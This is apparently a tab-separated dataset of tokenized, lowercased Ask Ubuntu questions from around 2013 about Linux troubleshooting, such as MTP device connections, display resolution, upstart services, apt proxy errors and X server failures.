320561	ca n't connect to android device	and , once again , my android device wo n't connect and i have to work through some complicated set of procedures to get it working . sorry to be bitter , but i 've now been through this too many times . it seems like with each upgrade of either ubuntu or android , everything stops working and once again i have to learn a whole new set of configurations i 've never seen before and wo n't see again . in any case , i 've never got mtp to work , i 've only ever got it to connect by usb mass storage , which was how it was working most recently . but now , since 13.04 , it seems that option has been taken away entirely . it is unbelievably frustrating , but i need to be able to connect by usb to transfer files , so here i go again ... when i plug in the device i get an error that says unable to open mtp device ' [ usb:002,003 ] ' : after some web searching , i found that i might need a program called go-mtpfs , so i tried that , and it failed : $ go-mtpfs /media/myandroid 2013/07/16 16:41:43 compiled against libmtp 1.1.5 device 0 ( vid=04e8 and pid=685e ) is a samsung galaxy y . 2013/07/16 16:41:43 found device samsung : galaxy y ( 04e8:685e ) @ bus 2 , dev 3 : libmtp panic : unable to find interface & endpoints of device 2013/07/16 16:41:43 rdev.open failed : open : open returned nil it really should n't be this complicated , but i am trying very hard not to rant ... how do i get my usb device to just connect , automatically , like it used to ?
320562	how to install latest version of chromium via ppa repository	i want to install latest version of chromium in my ubuntu desktop 12.04 . please guide me how to install latest version of chromium via ppa repository .
320567	how can i install my wi-max usb modem in ubutu 13.04 ?	i have installed ubuntu 13.04 . now i want know how to install my wi-max usb modem 's driver in my ubuntu 13.04 .
320570	setting screen size on chrome kiosk	i 'm trying to make a kiosk machine working with ubuntu ( 13.04 ) and i 'm done some parts.chrome is openning on kiosk mode but i do n't know how i set the chrome with my screensize .
320572	xubuntu 13.04 external display ca n't be set to 1920 ă 1080	i just installed xubuntu 13.04 with windows 8 dual boot on my dell xps 13 ( 2013 ) ultrabook . all is good , except when i connect my viewsonic hdmi 1080p full hd external monitor , it appears as display dp1 in xubuntu with a maximum screen resolution of 1024 x 768 . the monitor is : viewsonic vx2739wm model number : vs12843 optimum resolution : 1920x1080 wuxga it is discontinued . http : //www.viewsonic.com/us/vx2739wm.html i am connecting to a new dell xps 13 ( 2013 ) ultrabook using the minidisplay port adapter : i have also tried to used xrandr to fix the problem without much success . see below : step 1 $ cvt 1920 1080 # modeline `` 1920x1080_60.00 '' 173.00 1920 2048 2248 2576 1080 1083 1088 1120 -hsync +vsync step 2 $ xrandr -- newmode `` 1920x1080_60.00 '' 173.00 1920 2048 2248 2576 1080 1083 1088 1120 -hsync +vsync step 3 $ xrandr -- addmode dp1 1920x1080_60.00 step 4 $ xrandr -- output dp1 -- mode 1920x1080_60.00 the last command ( step 4 ) below completely messes up my laptop display and my external display switches off completely . i have a thread about this here , but all is quiet on the western front ( hence why i am posting here ) : http : //ubuntuforums.org/showthread.php ? t=2161010 any help would be greatly appreciated !
320574	upstart - bluepill not starting without sudo	i have an upstart service to start bluepill ( ruby gem to monitor processes ) . the upstart config is below . description `` start up the bluepill service '' start on runlevel [ 2 ] stop on runlevel [ 016 ] exec sudo /home/deploy/.rvm/wrappers/ < app_name > /bluepill load /home/deploy/websites/ < app_name > /current/config/server/staging/delayed_job.bluepill i want bluepill to be started as root . all upstart configs are run as root , when the machine boots , right ? so , no sudo should be needed in the upstart config 's exec line . the above script works just fine , and bluepill starts on system boot . but if i remove the sudo on the exec line , bluepill does not start on system boot . looking at the log , it seems like bluepill is starting as a non-privileged user and thus fails . can anybody explain why ? i do n't want sudo to be used , because , when i give respawn , upstart tracks the pid of the sudo process and not the pid of the actual bluepill process .
320576	ubuntu broken after interrupted software update	i was working while the ubuntu software update prompt popped up , yet again . i was very annoyed by its constant appearance , so i decided to authorize the update . it started , and after a few minutes , with the prompt in a different workspace , my computer froze , with me only being able to move my mouse . i left it for about a minute to be sure , then force shutdown the computer . when i started up again , everything was broken . instead of my menu buttons in the upper right corner , i had only a red circle with the white bar ( error symbol ) . upon click , it prompted me to perform a partial update . additionally , my touchpad stopped working , and when i checked the network section in system settings , neither wired nor wireless was there . after the partial update completed , another restart did n't bring me into a lightdm login screen but instead a command line . i logged on from the command line , and `` sudo lightdm '' could n't manually start the display either ; just stuck on a lightdm log . edit : it no longer can boot ( stuck at startup screen , recovery mode stuck after mounting root file system ) , i 'm trying to copy refind onto a usb and boot from the usb . my computer is a macbook pro ( late 2009 ) , and my distribution is 12.04 precise pangolin . thank you for helping ! i will try to copy the data onto a hard drive and do a backup , but meanwhile , if there is any other solution other than reinstalling , it would be really helpful .
320581	can you connect two monitors with ubuntu ?	i would like to know if you can connect two monitors with ubuntu , and if you can , then how do you adjust the display settings for the screen resolutions , launcher placement , etc . for multiple monitors ?
320582	is there `` force '' to be online ?	when i boot after plugged off the internet-network-cable - then booting hangs itself up at '' configuring network '' - that was not the case with kernel 3.2 ? i just noticed that this happens with kernel 3.9 and with 3.10 when booting offline ? in /etc/network/interfaces the entries look just normal - i think so ? : auto lo iface lo inet loopback auto eth0 iface eth0 inet dhcp next to dhcp lines in syslog there is output of apparmor ( of actually working kernel with internet-connection ) ... is this then an issue about apparmor ? !
320584	where is a good resource to learn more about linux ?	i 've been using windows oses for a very long time and learned a lot about it . but since i 've tried ubuntu , many things are different from windows operating systems . i want to learn more about linux , such as the file system , differences between linux and windows , e.t.c . recommend me some learning resources ?
320586	effects of initializing git repository on linux root directory 3 : )	i am running beaglebone black on ubuntu installed on sd card . i am learning to program the device in trial and error method by installing various packages ( just like cern guys study sub atomic particles by hitting them together in various angles and studying their trajectories ) . so can i initialize a git repository at root directory and ignore volatile directories like /sys and /proc ? or watching what system directories is sufficient to successfully time track entire os ? are there any similar snapshoting tools ? other than git , what repository system is best to time track binary files ? how to change filesystem to zfs ? during ubuntu installation am i provided with zfs filesytem option in addition to extx , fat , ntfs etc . filesystems , i never noticed ? -- edit -- what is list of non-volatile and important ( unlike /tmp ) directories in / ?
320587	ubuntu12.04 apt-get update issue	i got an odd issue on the ubuntu12.04 when i ran sudo apt-get update command : w : failed to fetch http : //mirrors.163.com/ubuntu/dists/precise-security/universe/i18n/translation-en something wicked happened resolving '**proxy3.serd.global.sharp.com.jp:3080** ' ( -5 - no address associated with hostname ) here 's my /etc/source.list : deb http : //mirrors.163.com/ubuntu/ precise main restricted deb-src http : //mirrors.163.com/ubuntu/ precise main restricted deb http : //mirrors.163.com/ubuntu/ precise-updates main restricted deb-src http : //mirrors.163.com/ubuntu/ precise-updates main restricted deb http : //mirrors.163.com/ubuntu/ precise universe deb-src http : //mirrors.163.com/ubuntu/ precise universe deb http : //mirrors.163.com/ubuntu/ precise-updates universe deb-src http : //mirrors.163.com/ubuntu/ precise-updates universe deb http : //mirrors.163.com/ubuntu/ precise multiverse deb-src http : //mirrors.163.com/ubuntu/ precise multiverse deb http : //mirrors.163.com/ubuntu/ precise-updates multiverse deb-src http : //mirrors.163.com/ubuntu/ precise-updates multiverse deb http : //mirrors.163.com/ubuntu/ precise-backports main restricted universe multiverse deb-src http : //mirrors.163.com/ubuntu/ precise-backports main restricted universe multiverse deb http : //mirrors.163.com/ubuntu/ precise-security main restricted deb-src http : //mirrors.163.com/ubuntu/ precise-security main restricted deb http : //mirrors.163.com/ubuntu/ precise-security universe deb-src http : //mirrors.163.com/ubuntu/ precise-security universe deb http : //mirrors.163.com/ubuntu/ precise-security multiverse deb-src http : //mirrors.163.com/ubuntu/ precise-security multiverse deb http : //extras.ubuntu.com/ubuntu precise main deb-src http : //extras.ubuntu.com/ubuntu precise main and .basrc and /etc/apt/apt.conf content : **http_proxy=http : //account : pwd @ myproxy:3080** **acquire : :http : :proxy `` http : //account : pwd @ myproxy:3080/ '' ** ; and /etc/resolve.conf : namespace 8.8.8.8 , 8.8.4.4 i also added google dns server ip ( 8.8.8.8 ) to the ipv4 dns configuration , but still failed . anyone knows why ?
320592	im trying to install firestorm on my laptop and i keep getting this can anyone help	william @ william-hp-pavilion-dv6000-ey799av-aba : ~ $ sudo apt-get install ia32-libs [ sudo ] password for william : reading package lists ... done building dependency tree reading state information ... done package ia32-libs is not available , but is referred to by another package . this may mean that the package is missing , has been obsoleted , or is only available from another source e : package 'ia32-libs ' has no installation candidate
320596	3g data connection assistant on ubuntu touch	i still could n't manage to create a woeking 3g data connection with ubuntu touch developer preview on my nexus 4 phone : - ( will there be a setup assistant on the phone once version 1.0 is ou tu help one to get this working ? thanx in advance ! cheers andi
320608	permission denied while writing a file in var/www inspite of adding me to user group	i gave permissions to read and write files in /var/www to the working user ( me ) through the steps given in whats the simplest way to edit and add files to â/var/wwwâ ? . it works fine when i try to create/read file in the project directory . say i am working in /var/www/xyz i am able to read and write files in this folder through a php code . now , i have created a folder inside folder xyz , say abc /var/www/xyz/abc in my php code when i read a file situated inside abc , it works fine , but it gives me warning : permission denied when i try to create a file in this folder . the exact warning is warning : fopen ( abc/a.txt ) : failed to open stream : permission denied in /var/www/xyz/code.php i was asked to provide some output : stat /var/www/dodge file var/www/dodge ' size : 4096 blocks : 8 io block : 4096 directory device : 700h/1792d inode : 1445503 links : 8 access : ( 2775/drwxrwsr-x ) uid : ( 33/www-data ) gid : ( 33/www-data ) access : 2013-07-16 16:29:21.434531583 +0530 modify : 2013-07-16 14:07:46.482782580 +0530 change : 2013-07-16 16:28:04.622533850 +0530 birth : - stat /var/www/xyz/abc file : /var/www/dodge/codes ' size : 4096 blocks : 8 io block : 4096 directory device : 700h/1792d inode : 1446465 links : 2 access : ( 0775/drwxrwxr-x ) uid : ( 1000/ wq ) gid : ( 1000/ wq ) access : 2013-07-16 15:16:15.554661170 +0530 modify : 2013-07-16 15:13:42.698665686 +0530 change : 2013-07-16 15:13:42.698665686 +0530 birth : -
320612	monitor blinks on and off and sometimes shuts off	i love ubuntu and have n't even had to ask a question here but it seems the time has come that i must . the newest version , 13.04 , has a lot of problems.. but this problem is one that is n't specific 13.04 because i have tried 12.04 and 12.10 with the same results ! i have been using this lenovo t520 with intel integrated graphics 3000 and loving it . a recently purchased dell 27 '' ultra-sharp u2713hm monitor with promised 2560x1440 resolution poses a problem . randomly during normal use ( and almost instantly during heavy use ) the monitor blinks off/on and sometimes shuts off completely forcing a manual restart of the monitor ! at lower resolution ( 1920x1200 ) over displayport there are no problems at all . in windows 7 , everything appears to be working perfectly as well . i 've installed the new may 20th 2013 intel integrated graphics driver and the problem still persists . let me know if any information is needed but i would sure appreciate anyone that can take a minute to point me in the right direction . thank you !
320613	want to acess /var/cache/apt/archives manully in file folders	i want to copy some archives offline in archives folder , so please help me . currently i am using ubuntu 13.04 and also suggest me how can i directly install software in ubuntu like in windows - offline . i am a new user on ubuntu .
320614	how to install moonlight in ubuntu 12.0.4 ?	i tried to open this link in ubuntu 12.0.4. but it suggested to install silverlight . i searched in google for this , finally i got ubuntu not supported to silverlight , so we need to install moonlight . for this , i run the following command : sudo apt-get install mono-complete after installing , i refresh the above page . still it 's not working . how can i fix this ?
320615	ca n't access apache on virtualbox vm ( using nat + host-only )	short description : my host os is ubuntu-12.04 and using virtualbox i have set up a vm of oracle linux 6.4 ( based on rhel ) with apache httpd webserver . i need to access the web pages served by the vm from my host ubuntu . ================================================================================ additional details : here are the configurations : the 1st network adapter of the vm is configured as nat , since i need it to use the host 's internet connection . see image below : i have enabled a 2nd adapter as host-only , so i can access the vm from the host ( ssh or scp to guest vm from host , etc ) . this is working fine . the ip of the guest vm is manually set to 10.10.10.15 and i can successfully ping , ssh and scp to the guest vm without any problem . see below : inside the vm , i have setup apache successfully and it 's working for localhost but when i try to access the page from the host , by entering 10.10.10.15 in chromium or firefox , it fails to connect ! : ( i have also tried to add an entry inside /etc/hosts as follows , but entering test-website.net inside chromium or firefox still gives the same error ! : ( 10.10.10.15 test-website.net one more thing to note is about selinux . as you might know , selinux is enabled by default on rhel-based distros such as centos and oracle-linux . to make sure that selinux is not messing up my work , i have configured it to permissive mode in /etc/selinux/config and confirming the effect after reboot using sestatus : selinux status : enabled selinuxfs mount : /selinux current mode : permissive mode from config file : permissive policy version : 26 policy from config file : targeted ================================================================================ this may sound like a duplicate of the following questions , but the answers in these questions suggest to setup a host-only adapter for the guest and configure /etc/hosts in the host , which i have already tested and did n't work for me : question # 1 question # 2 any help ? !
320623	installing updates selectively from command line	i have gone through forums and could not find a definitive answer for a requirement that i have . any help would be much appreciated . i have a server machine running ubuntu 11.10 server . when i log in to it i see a message of the form 60 packages can be updated . 23 updates are security updates . how can i install updates selectively ( pick and choose ) through command line . for instance i might want to install only the security updates . i know that support for 11.10 has ended . but i can not upgrade to a higher version at the moment . as i mentioned earlier , i 'm on 11.10 and can not upgrade to a later version . i 'm not sure if i run apt-get dist-upgrade , will it upgrade me from 11.10 to some higher version , or will i stay on 11.10 and only updates for 11.10 will be installed . thanks
320630	nautilus / files does not use icon theme	i just installed a new icon theme on my laptop ( ubuntu 13.04 ) . unfortunately , nautilus/files ( version 3.6.3 ) keeps showing the wrong folder icons ( from the humanity-theme ) . as far as i can tell , every other icon is correctly displayed ( even folder shortcuts in the dash ) . i already restarted the system and copied the icon theme from ~/.icons to /usr/share/icons - without any effects . since the icon theme works 100 % perfectly on my desktop machine , i can tell for sure , that the theme is not broken . any ideas ?
320632	why do i need to type `./` before executing a program in the current directory ?	while executing a c program , a.out , using the ubuntu terminal , why do i always need to type ./ before a.out , instead of just writing a.out ? is there solution for this ?
320633	is it possible to hide netbeans title bar like firefox in gnom 3 ?	i am using ubuntu 13.047 with gnome 3 . i want to hide netbeans ( 7.3.1 ) title bar like firefox . is it possible ?
320634	how do i create a symbolic link	i was wondering how to create a symbolic link in ubuntu ( 12.04 lts ) . i 've done this before but this time it is a little different . this command worked before . user @ desktop : /media/backup/folder $ ln -sv file.ods /home/user/file.ods the last time i i created a file from my backup drive [ harddisk ] . now i would like to create a symbolic link to a file present on a fileserver . this is a virtual machine and probably a network connection to it is required . the fileserver ( networkshare ) is mounted at /media/fileserver . i did try to use the same command as mentioned above , however , it create an empty file when opened it askes to be deleted because it is empty and useless . when i do the command from above , it does not work . so , can someone help me out here ?
320636	ppa repositories after installing kubuntu-desktop	i recently installed kubuntu-desktop in ubuntu 12.04 . but the problem is that i can not get some software that i require . i think the reason is that the software repos are the originally provided gnome unity repos and not the kubuntu repos . when i do sudo apt-get update sudo apt-get install package-name i am not able to install kdm packages because they are not found . whereas , i can easily find and install gnome unity packages . what should i do install these softwares ? and yes , any general things-after-installing-kubuntu-desktop tips ? edit : let me make myself more clear . i want to install this particular package kdmtheme . but when i do apt-cache search kdmtheme i get no results . i think the reason for this is that , when installing kubuntu-desktop only a few softwares and packages are installed . so what if i want to install any additional kde software ? since no extra repos are installed while installing kubuntu-desktop i can not install these via terminal using apt-get , can i ? for doing this i will have to add additional software repos of kde , right ?
320637	how to boot from folder in virtualbox ?	i just downloaded virtualbox and i wish to know how to boot from a specific folder in my hard drive i stored my ubuntu ( 12.10 ) installation files in a single folder ( copied it from the iso ) and unfortunately my computer does n't have iso utilities in it . since i put my installation files in a folder , how do i set virtualbox to boot from the folder with the ubuntu installation files ? cheers i 'm using windows as the host .
320639	ubuntu 12.10 & 13.04 problems	i have a an hp pavilion g6-1311 15.6-inch hd laptop ( amd dual-core a4-3305m 1.9 ghz processor , 6gb ddr3 ram , 500gb 5400rpm sata hdd , amd radeon hd 6480g discrete-class graphics . i currently run ubuntu 12.04 with the 'nomodeset ' parameter . if this perameter is not set ubuntu will not boot . when i tried to upgrade to 13.04 i had to add the nomodeset parameter again . unfortunately ubuntu 13.04 is unusable on my laptop , i can only really describe it as choppy and laggy . the desktop is slow and it does render it useless . i have tried to install a number of different graphic drivers ( including catalyst ) with no success . i have the same sort of problems with ubuntu 12.10 but the os wont even boot to the log in screen . after this i tried to istall the gnome spin and i have the exact same problems . i tried to install a few other distros too , one being fedora 17 ( gnome 3 ) and again , i experiance a slow choppy desktop . gnome 2 distros seem to be fine , as do cinnamon desktops . i tried opensuse and this worked but reverted me to ( fallback mode ) which was gnome 2 . i have tried some other desktops such as cinnamon and it wors fine but anything running gnome 3 or unity will not work past ubuntu 12.04 ( must be 'nomodeset ' ) . could you tell me what might be my problem and how i may get around this ( if it is possible ) as i 'd love to install 13.04 and derivatives of this .
320640	how can i get sequential execution list of init scripts ?	i write following script but it is not working during upstart , start on startup exec echo `` current date : - '' $ ( date ) > /tmp/myscript.out i have stored this script as /etc/init/myscript.conf please help me with this . thanks in advance .
320642	how do i get wireless internet to work on a lenovo 3000 n200 ?	i 've managed to get the internet to work through an ethernet lead on my new ubuntu-running laptop , but i ca n't get the wireless to connect . does anyone know any techniques ? i 'm very , very green with all this , being a bog-standard windows user all my life and not usually exploring beyond task bars , but i 'm attentive and good at following instructions closely so any advice will be thoroughly followed as long as you stick to a minimum of jargon . i 've been asked to input the command lspci | grep -i net into a terminal window and report what comes out- it gives me : 04:00.0 network controller : intel corporation pro/wireless 3945abg [ golan ] network connection ( rev 02 ) 06:00.0 ethernet controller : broadcom corporation netlink bcm5906m fast ethernet pci express ( rev 02 ) the machine ca n't see any wireless networks as of now , and i do know there is one up and running here with good strength etc . hope this last bit of info helps , thank you
320643	windows 8 , ubuntu problem , bios	i bought a samsung 370r , it has bios version p07ran , i followed the instruction to install 13.04 , it created partition all good and then whenever i restart computer , and hit on `` ubuntu '' as one of the options to load , it gives me this error '' windows failed to start ... . file : \ubuntu\winboot\wubildr.mbr status : 0xc000007b info : the application or operating system could not be loaded because required file is missing or contains error big thanks for any help in advance .
320651	dmg2img image is corrupt	okay , so i have a .dmg file i want to convert to .img it 's stored in my home directory so i type : dmg2img image.dmg image.img ( the image is actually called image ) then i get : caitlan @ caitlan-imac : ~ $ dmg2img image.dmg image.img dmg2img v1.6.2 is derived from dmg2iso by vu1tur ( to @ vu1tur.eu.org ) error : dmg image is corrupted what can i do ? can i fix this ? could i use a different program to do the conversion ? i 'm 90 % sure the image is n't corrupted
320652	gnome 3 desktop environment	after taking the regular update through the update manager my gnome-shell does n't work , i am working on ubuntu 12.04 lts , and i have uninstalled and re-installed but the same issue persists . please help .
320661	change git 's language to english without changing the locale	my locale is german . lang=de_de.utf-8 . i would like to keep it . is it possible to change git 's language to english without changing the locale ?
320666	how do i kill the x-server ?	every time i try to kill the x-server , sudo service lightdm stop so that i can install the latest nvidia drivers , i get an error message . stop : unknown instance : what am i doing wrong ?
320673	apache occasionally hangs , wo n't stop or restart	once a week or so , apache just becomes completely unresponsive . if i try service apache2 restart , it says it 's stopping apache , but then sits there . sometimes killing all the processes works , but sometimes even that does n't allow me to successfully restart . a restart of the whole server solves the problem , but sometimes even when i think apache is dead , the shutdown process hangs at * stopping web server apache2 , forcing me to reach for the ( virtual ) reset button . fwiw , if i killall apache processes and try to start , it does the same thing . it just says it 's starting and never starts . apache error log shows nothing except sigterm caught . since stopping the processes does n't seem to consistently help , could it be something file related ? a locked file ? a weird configuration ? php ? the system is 64-bit ubuntu 12.04 running in a virtualbox instance . i used nfs to share files with my desktop , and that 's where my virtualhosts are . other than that , pretty vanilla apache and php on ubuntu . i have googled like a man obsessed to no avail . any ideas ?
320674	how to use gsettings when there is no schema listed	i 'm wanting to write a script to reorder the loading of compiz modules , so while using the unity desktop , expo and scale are loaded last and the set hotcorners in those plugins , will remain active upon reboot . this can easily be done using the gui dconf-editor . however any time an update comes through for unity , this setting is put back to the default of loading the unity module last , and killing the hotcorners . so needing a cli method to change the setting in dconf-editor located at org/compiz/profiles/unity/plugins/core from [ 'core ' , 'composite ' , 'opengl ' , 'copytex ' , 'decor ' , 'regex ' , 'compiztoolbox ' , 'place ' , 'imgpng ' , 'grid ' , 'unitymtgrabhandles ' , 'resize ' , 'mousepoll ' , 'snap ' , 'gnomecompat ' , 'move ' , 'vpswitch ' , 'session ' , 'wall ' , 'animation ' , 'workarounds ' , 'expo ' , 'scale ' , 'fade ' , 'ezoom ' , 'unityshell ' ] to [ 'core ' , 'composite ' , 'opengl ' , 'copytex ' , 'decor ' , 'regex ' , 'compiztoolbox ' , 'place ' , 'imgpng ' , 'grid ' , 'unitymtgrabhandles ' , 'resize ' , 'mousepoll ' , 'snap ' , 'gnomecompat ' , 'move ' , 'vpswitch ' , 'session ' , 'wall ' , 'animation ' , 'workarounds ' , 'fade ' , 'ezoom ' , 'unityshell ' , 'expo ' , 'scale ' ] so issuing the command gsettings list-schemas | grep -i compiz shows that there 's no schema for what i need to change so trying instead gsettings list-recursively | grep -i compiz gives a much longer list , but not much useful to my project . where have i gone wrong or is there another solution to my problem ?
320678	how to stop socket with linux command ?	how to stop socket in linux : socket == > root @ root : /home/aa/test # netstat | grep 3966 tcp 0 0 server:3966 server:57004 time_wait thank
320679	blank purple screen on boot	i have installed a windows 8/ubuntu 13.04 dual boot . grub2 seems to have been installed allright and i can boot windows 8 from it without a problem . ubuntu booted allright the first time ( right after the installer 's reboot ) . however , whenever i try to boot it again , it just hangs at a blank purple screen . no ubuntu splash with changing dots under it . i tried ctra+slt+f1 , nothing happens . i tried leaving it for a while , nothing changes . no hdd activity either . any idea what it might be ? i read that it could be nvidia drivers ( i have an nvidia 740m ) , but the funny thing is that it did boot and work the first time after install , and seems to have stopped after that . if it were a driver issue , should n't it have failed every time i reboot it ? also the first time it ( successfully ) booted , i seem to remember a type of nouveau dms pointer error/printout on boot , but it booted fine after that . any help is much appreciated .
320680	are update-alternatives and path related ?	i 've seen similar questions to this but none have really answered the exact question i have . are update-alternatives and path related , or alternatives to one another ? i ask because i 'm a complete beginner with ubuntu and am setting up java on my machine . some guides i 've followed download and extract it and then enter a location for java_home and export it usually in the user 's bashrc file , like so : java_home=/usr/lib/jvm/jdk1.7.0_21/ export java_home however , other guides use the update-alternatives install command , like so : sudo update-alternatives -- install `` /usr/bin/java '' `` java '' `` /usr/lib/jvm/jdk1.7.0/bin/java '' 1 sudo update-alternatives -- install `` /usr/bin/javac '' `` javac '' `` /usr/lib/jvm/jdk1.7.0/bin/javac '' 1 sudo update-alternatives -- install `` /usr/bin/javaws '' `` javaws '' `` /usr/lib/jvm/jdk1.7.0/bin/javaws '' 1 i know the latter effectively sets up a symlink to the /usr/bin folder which i think is a quite `` clean '' way of doing it . how does the export java_home way work ? and is one preferable to the other ?
320684	toshiba satellite l855-12r overheats	i bought a toshiba satellite l855-12r several months ago and started playing assassin 's creed . whenever i play this game or any other game , it starts to overheat . i tried restarting the computer several times but it has not helped . could this be due to a virus or another problem ?
320687	bind a port to a network interface	is it possible to bind an arbitrary port , say 1337 , to a specific nic ? i have 2 nics , one configured for ipv4 , the other for ipv6 . i want to ensure that whenever port 1337 is used , it goes through the ipv6 interface .
320689	ca n't disable nmi_watchdog	following directions from here and here i tried running sudo echo 0 > /proc/sys/kernel/nmi_watchdog but this results in permission denied . i also tried setting the line grub_cmdline_linux_default= '' quiet splash nmi_watchdog=0 '' in /etc/default/grub but after restarting it has no effect i still see /proc/sys/kernel/nmi_watchdog set to 1 . finally i could not find the commended file /boot/grub/grub.conf but instead i found /boot/grub/grub.cfg and i have no idea where the argument `` nmi_watchdog=0 '' should be placed there . can anyone please advice how to disable nmi_watchdog ?
320691	ubuntu boots on terminal only , how do i recover the gui desktop ?	where is my ubuntu desktop ? its booting and going always default to terminal screen , if i press ctrl+alt+f7 still in terminal ctrl+alt+f1 still in terminal . no gui , how do i recover it ? edit : sun @ e700gent : /etc/x11 $ sudo apt-get install -- reinstall ubuntu-desktop [ sudo ] password for sun : reading package lists ... done building dependency tree reading state information ... done the following packages were automatically installed and are no longer required : libcdio-paranoia1 packagekit-backend-aptcc gdebi-core libxrandr-ltsq2 linux-headers-3.5.0-23-generic linux-headers-3.5.0-23 libcdio-cdda1 libllvm3.1 use 'apt-get autoremove ' to remove them . 0 upgraded , 0 newly installed , 1 reinstalled , 0 to remove and 209 not upgraded . need to get 0 b/4,016 b of archives . after this operation , 0 b of additional disk space will be used . ( reading database ... 230006 files and directories currently installed . ) preparing to replace ubuntu-desktop 1.267.1 ( using ... /ubuntu-desktop_1.267.1_amd64.deb ) ... unpacking replacement ubuntu-desktop ... setting up ubuntu-desktop ( 1.267.1 ) ... sun @ e700gent : ~ $ unity -- reset warning : no display variable set , setting it to :0 ( process:2541 ) : gconf-warning ** : client failed to connect to the d-bus daemon : //bin/dbus-launch terminated abnormally with the following error : autolaunch error : x11 initialization failed . warning : environment is incorrect : no d-bus daemon running did you just try to reset in a tty ? unity-panel-service : no process found compiz ( core ) - fatal : could n't open display :0 sun @ e700gent : ~ $ sudo startx [ sudo ] password for sun : x.org x server 1.11.3 release date : 2011-12-16 x protocol version 11 , revision 0 build operating system : linux 2.6.42-37-generic x86_64 ubuntu current operating system : linux e700gent 3.5.0-36-generic # 57~precise1-ubuntu smp thu jun 20 18:21:09 utc 2013 x86_64 kernel command line : boot_image=/boot/vmlinuz-3.5.0-36-generic.efi.signed root=uuid=68af0547-17ed-4a85-8369-244d57223f91 ro quiet splash vt.handoff=7 build date : 11 april 2013 01:05:39pm xorg-server 2:1.11.4-0ubuntu10.13 ( for technical support please see http : //www.ubuntu.com/support ) current version of pixman : 0.24.4 before reporting problems , check http : //wiki.x.org to make sure that you have the latest version . markers : ( -- ) probed , ( ** ) from config file , ( == ) default setting , ( ++ ) from command line , ( ! ! ) notice , ( ii ) informational , ( ww ) warning , ( ee ) error , ( ni ) not implemented , ( ? ? ) unknown . ( == ) log file : `` /var/log/xorg.0.log '' , time : tue jul 16 17:37:57 2013 ( == ) using system config directory `` /usr/share/x11/xorg.conf.d '' fatal server error : no screens found please consult the the x.org foundation support at http : //wiki.x.org for help . please also check the log file at `` /var/log/xorg.0.log '' for additional information . ddxsiggiveup : closing log server terminated with error ( 1 ) . closing log file . edit : it seems like solving this problem is like rocket science , its unfixed . instead of wasting time debugging it , i finally re-install the ubuntu .
320693	how can i change the desktop wallpaper from the command line in ubuntu desktop 13.04 ?	how can i change the desktop wallpaper from the command line in ubuntu desktop 13.04 ? i most recent tried the following , but it did not work : gsettings set org.gnome.desktop.background picture-uri file : // $ home/naturalhistorymuseum_en-us7862662491_1920x1200.jpg update : as commented by @ lucio below , the command worked if i used a path without a variable : gsettings set org.gnome.desktop.background picture-uri file : ///home/user/naturalhistorymuseum_en-us7862662491_1920x1200.jpg
320700	where does nautilus-actions configuration tool save actions ?	i want to use a command line , but do n't know how this configuration looks like and where to save it .
320706	how to install xubuntu 13.04 theme to ubuntu 13.04	i would like to know how to install default xubuntu theme along with xubuntu default icon to ubuntu 13.04 .
320707	add windows boot manager entry for ubuntu on windows 7	i installed ubuntu few months back via the windows installer and use it on a daily basis on my notebook in a dual-boot setup . i wanted to free up some space in win7 by removing some programs and i removed ubuntu related application also accidentaly . i do n't know whether it harmed my ubuntu system or not ( i hope it 's not ) but i know that it removed ubuntu entry from windows boot loader , so i 'm not able to boot to ubuntu now . so , my question is how can i add an entry to my windows boot loader on win7 which points to my ubuntu system ? i tried to solve this issue with easybcd 2.2 without any luck . i run boot-repair and got the following log of my system : link to my partition info if somebody could be so kind to tell me what shoud i do i would highly appriciate .
320710	ubuntu multiple monitor support	i have recently aquired a dell inspiron 15r special edition ( 7520 ) and i am trying to get 2 monitors connected , plus the laptop screen . with a single monitor i can have things working no problem , but when two monitors are connected the 2nd one does not work , it receives no signal . if i swap around the monitors , i can have any combination of two working , even both monitors with no laptop screen . is there a way i can have my display extended across all three displays , without having to purchase a $ 300 matrox triple head device ?
320712	how do i fix problem with trying to install ubuntu ? black screen appears	i 'm trying to install ubuntu version 13.04 ( x64 ) on a desktop computer already running win8 i 'd like to dualboot . the system is 64-bit with uefi . when i attempt to install ubuntu from a burned dvd , i arrive at the menu that asks if i want to `` try without installing '' , `` install ubuntu '' , and 2 other options i ca n't remember ( not important ) . if i choose any of the options ( i 'd like to try without installing but i 've tried to install straight from this menu as well ) , the menu goes away and is replaced by a black screen . this problem has persisted no matter what options i 've changed . i 've disabled secureboot , fastboot , quickboot , updated my drivers and done everything else that i can think of/that has been suggested . the only thing that has been suggested that i have not done ( besides give up ) is boot nomodeset . i do n't know how to boot nomodeset , and i do n't know if it would fix the issue i 'm having . if anyone could tell me how to do this i would really appreciate it . also , if there are any other suggestions as to how i could possible fix the issue , i would love it i looked at this question : my computer boots to a black screen , what options do i have to fix it ? that post shows a purple screen that displays the ubuntu logo . when i try to run anything , the screen is completely black and the keyboard seems to be disabled . no matter what key i press nothing happens . every `` fix '' i 've seen shows this purple ubuntu boot screen ( which i 'm now assuming is grub 2 ) . i do n't get this purple screen . when i try to boot from a dvd , i get a black screen with 3 or 4 options . pressing f6 does n't do anything and most of the people are saying i need to press f6 from the grub2 menu and boot nomodeset . is there any way to do the same thing from this black menu that i 'm getting ( which i assume is grub ( archaic ? )
320713	vmware tools - there was a problem updating a software component . try again later and if the problem persists , contact vmware support	error : `` there was a problem updating a software component . try again later and if the problem persists , contact vmware support or your system administrator . '' i get this error when trying to install vmware tools . the host is xubuntu / ubuntu 13.04 and the guest is windows 8 . both are 64bit . how can i fix this ? thank you -bathynomus tags : vmware tools , vmplayer , vmware-player-5.0.2-1031769.x86_64 , xubuntu 13.04 host , windows 8 guest edit : this was an easy fix . i should have known to use sudo when starting vmplayer . sudo /usr/bin/vmplayer
320716	networking with at & t	just installed ubuntu and currently have no network or internet on that computer , not sure how to set it up . i have the at & t nvg510 modem/router . any help would be great thanks !
320719	hud is eating my ram	i 'm running 13.04 64bit on a dell latitude with 8gb ram . recently , the hud search results are being sorted differently , i suppose that 's due to unity updates . what 's worse is that my system is performing very poorly since these changes appeared and my laptop overheats . running 'top ' in a terminal shows a process called `` hud-service '' consuming about 50 % of my ram . cpu usage equals . does anyone encounter the same and know a solution ? killing the hud is not an option , because i use it quite often . i have now filed a bug report on launchpad : https : //bugs.launchpad.net/ubuntu/+source/unity/+bug/1203718
